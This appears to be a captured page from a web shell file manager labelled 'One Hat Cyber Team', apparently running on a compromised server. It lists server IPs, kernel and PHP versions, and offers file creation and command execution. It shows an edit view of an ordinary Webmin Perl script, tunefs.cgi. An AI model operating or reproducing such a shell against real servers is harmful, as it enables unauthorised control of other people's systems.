⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.13
Server IP:
109.199.105.153
Server:
Linux connect.inboxifs.com 5.15.0-152-generic #162-Ubuntu SMP Wed Jul 23 09:48:42 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
webmin
/
fdisk
/
Edit File: tunefs.cgi
#!/usr/bin/perl # tunefs.cgi # Do the tuning of a filesystem require './fdisk-lib.pl'; &ReadParse(); &can_edit_disk($in{'dev'}) || &error($text{'tunefs_ecannot'}); &error_setup($text{'tunefs_err'}); $cmd = &tunefs_parse($in{type}, $in{dev}); &ui_print_unbuffered_header(undef, $text{'tunefs_title'}, ""); print "<b>",&text('tunefs_exec', "<tt>$cmd</tt>"),"</b>\n"; print "<pre>\n"; &foreign_call("proc", "safe_process_exec_logged", $cmd, 0, 0, STDOUT, undef, 1); print "</pre>\n"; if ($?) { print "<b>$text{'tunefs_failed'}</b><p>\n"; } else { print "<b>$text{'tunefs_ok'}</b><p>\n"; } &webmin_log("tunefs", undef, $in{'dev'}, \%in); &ui_print_footer("", $text{'index_return'});
Simpan